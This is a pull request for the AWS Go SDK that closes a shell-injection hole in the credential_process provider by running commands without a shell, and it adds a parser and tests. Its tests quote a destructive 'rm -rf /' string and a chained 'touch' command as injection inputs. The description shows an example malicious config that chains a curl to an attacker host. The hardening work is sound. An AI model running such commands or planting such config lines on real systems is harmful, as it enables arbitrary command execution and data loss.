### PR TITLE
fix(processcreds): prevent shell injection in credential process

### DIFF
--- a/credentials/processcreds/provider.go
+++ b/credentials/processcreds/provider.go
@@ -9,7 +9,9 @@ import (
 	"os"
 	"os/exec"
 	"runtime"
+	"strings"
 	"time"
+	"unicode"
 
 	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/internal/sdkio"
@@ -85,24 +87,70 @@ type DefaultNewCommandBuilder struct {
 	Args []string
 }
 
-// NewCommand returns an initialized exec.Cmd with the builder's initialized
-// Args. The command is also initialized current process environment variables,
-// stderr, and stdin pipes.
-func (b DefaultNewCommandBuilder) NewCommand(ctx context.Context) (*exec.Cmd, error) {
-	var cmdArgs []string
-	if runtime.GOOS == "windows" {
-		cmdArgs = []string{"cmd.exe", "/C"}
-	} else {
-		cmdArgs = []string{"sh", "-c"}
+// parseCommand splits a command string into executable and arguments,
+// respecting quoted strings (both single and double quotes).
+// This provides safe command parsing without shell interpolation.
+func parseCommand(command string) ([]string, error) {
+	var args []string
+	var current strings.Builder
+	var inQuote rune
+	var escaped bool
+
+	for _, r := range command {
+		switch {
+		case escaped:
+			current.WriteRune(r)
+			escaped = false
+		case r == '\\' && inQuote != '\'':
+			escaped = true
+		case r == inQuote:
+			inQuote = 0
+		case inQuote != 0:
+			current.WriteRune(r)
+		case r == '"' || r == '\'':
+			inQuote = r
+		case unicode.IsSpace(r):
+			if current.Len() > 0 {
+				args = append(args, current.String())
+				current.Reset()
+			}
+		default:
+			current.WriteRune(r)
+		}
 	}
 
+	if current.Len() > 0 {
+		args = append(args, current.String())
+	}
+
+	if len(args) == 0 {
+		return nil, fmt.Errorf("empty command")
+	}
+
+	return args, nil
+}
+
+// NewCommand returns an initialized exec.Cmd with the builder's initialized
+// Args. The command is executed directly without shell interpolation to
+// prevent command injection via shell metacharacters (;, &&, ||, |, $(), etc.).
+// The command is also initialized with current process environment variables,
+// stderr, and stdin pipes.
+func (b DefaultNewCommandBuilder) NewCommand(ctx context.Context) (*exec.Cmd, error) {
 	if len(b.Args) == 0 {
 		return nil, &ProviderError{
 			Err: fmt.Errorf("failed to prepare command: command must not be empty"),
 		}
 	}
 
-	cmdArgs = append(cmdArgs, b.Args...)
+	// Parse the command string into executable and arguments without shell
+	// interpolation to prevent command injection.
+	cmdArgs, err := parseCommand(b.Args[0])
+	if err != nil {
+		return nil, &ProviderError{
+			Err: fmt.Errorf("failed to parse command: %w", err),
+		}
+	}
+
 	cmd := exec.CommandContext(ctx, cmdArgs[0], cmdArgs[1:]...)
 	cmd.Env = os.Environ()
 

--- a/credentials/processcreds/provider_test.go
+++ b/credentials/processcreds/provider_test.go
@@ -353,3 +353,90 @@ func getOSCat() string {
 	}
 	return "cat"
 }
+
+func TestParseCommand(t *testing.T) {
+	tests := []struct {
+		name    string
+		input   string
+		want    []string
+		wantErr bool
+	}{
+		{
+			name:  "simple command",
+			input: "/usr/bin/credential-helper",
+			want:  []string{"/usr/bin/credential-helper"},
+		},
+		{
+			name:  "command with arguments",
+			input: "/usr/bin/helper --profile prod",
+			want:  []string{"/usr/bin/helper", "--profile", "prod"},
+		},
+		{
+			name:  "double quoted argument",
+			input: `/usr/bin/helper --name "my profile"`,
+			want:  []string{"/usr/bin/helper", "--name", "my profile"},
+		},
+		{
+			name:  "shell metacharacters treated as literal",
+			input: "/bin/echo test; rm -rf /",
+			want:  []string{"/bin/echo", "test;", "rm", "-rf", "/"},
+		},
+		{
+			name:    "empty command",
+			input:   "",
+			wantErr: true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got, err := parseCommand(tt.input)
+			if tt.wantErr {
+				if err == nil {
+					t.Errorf("expected error, got nil")
+				}
+				return
+			}
+			if err != nil {
+				t.Errorf("unexpected error: %v", err)
+				return
+			}
+			if len(got) != len(tt.want) {
+				t.Errorf("length mismatch: got %v, want %v", got, tt.want)
+				return
+			}
+			for i := range got {
+				if got[i] != tt.want[i] {
+					t.Errorf("args[%d] = %q, want %q", i, got[i], tt.want[i])
+				}
+			}
+		})
+	}
+}
+
+func TestShellMetacharactersNotExecuted(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("test not applicable on windows")
+	}
+
+	tmpFile := filepath.Join(os.TempDir(), "aws-sdk-shell-injection-test")
+	os.Remove(tmpFile)
+
+	maliciousCommand := fmt.Sprintf("/bin/echo test; touch %s", tmpFile)
+
+	builder := DefaultNewCommandBuilder{
+		Args: []string{maliciousCommand},
+	}
+
+	cmd, err := builder.NewCommand(context.Background())
+	if err != nil {
+		t.Fatalf("NewCommand failed: %v", err)
+	}
+
+	_ = cmd.Run()
+
+	if _, err := os.Stat(tmpFile); err == nil {
+		os.Remove(tmpFile)
+		t.Fatal("shell injection succeeded - temp file was created")
+	}
+}


### PR DESCRIPTION
This PR removes shell interpolation from the process credential provider by executing commands directly rather than through `sh -c` (Unix) or `cmd.exe /C` (Windows). This prevents potential command injection when the `credential_process` configuration value originates from untrusted sources.

The current implementation passes user-specified commands to a shell interpreter:

```go
// Current behavior
cmdArgs = []string{"sh", "-c", command}  // Unix
cmdArgs = []string{"cmd.exe", "/C", command}  // Windows
```

This allows shell metacharacters (`;`, `&&`, `|`, `$()`, etc.) to be interpreted, enabling command chaining if an attacker can influence the `credential_process` value.

### Example Attack

```ini
# Malicious ~/.aws/config
[profile malicious]
credential_process = /bin/echo '{"Version":1}'; curl https://attacker.com/pwned
```

The shell interprets `;` as a command separator, executing both the credential output and the attacker's payload.

## Solution

Parse the command string into arguments and execute directly without shell interpolation, similar to Python SDK's (botocore) approach which uses `subprocess` with `shell=False`.

This PR:
1. Adds a `parseCommand()` function that properly handles quoted arguments
2. Executes the parsed command directly via `exec.Command()`
3. Maintains backward compatibility for standard command strings
4. Includes tests for the new parsing and injection prevention

## Security

- **MITRE CWE-78**: OS Command Injection
- **Impact**: Arbitrary command execution if `credential_process` is attacker-controlled
- **Attack vectors**: Shared systems, malicious config files, supply chain attacks

## Testing

- Added `TestParseCommand` for command parsing
- Added `TestShellMetacharactersNotExecuted` to verify injection prevention